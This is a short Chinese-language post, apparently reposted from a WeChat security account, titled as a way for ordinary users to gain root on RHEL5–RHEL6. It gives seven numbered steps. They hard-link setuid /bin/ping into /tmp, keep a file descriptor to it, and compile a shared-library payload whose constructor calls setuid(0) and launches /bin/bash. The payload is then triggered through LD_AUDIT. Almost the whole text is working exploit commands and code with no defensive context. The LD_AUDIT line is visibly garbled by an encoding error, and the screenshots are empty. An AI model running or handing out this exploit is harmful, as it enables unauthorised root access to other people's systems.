说明:RHEL5—RHEL6下 都可以提权
1. ls -ld /tmp/
![普通用户提权]( "普通用户提权")
2. ls -l /bin/ping
![普通用户提权]( "普通用户提权")
3. mkdir /tmp/exploit ; ln /bin/ping /tmp/exploit/target
![普通用户提权]( "普通用户提权")
4. exec 3< /tmp/exploit/target ; rm -rf /tmp/exploit/ ; ls -l /proc/$$/fd/3
![普通用户提权]( "普通用户提权")
![普通用户提权]( "普通用户提权")
5. vim payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
![普通用户提权]( "普通用户提权")
6. gcc -w -fPIC -shared -o /tmp/exploit payload.c ; ls -l /tmp/exploit
![普通用户提权]( "普通用户提权")
7. LD_AUDIT="�RIGIN" exec /proc/self/fd/3
![普通用户提权]( "普通用户提权")
本文始发于微信公众号(飓风网络安全):普通用户提权
评论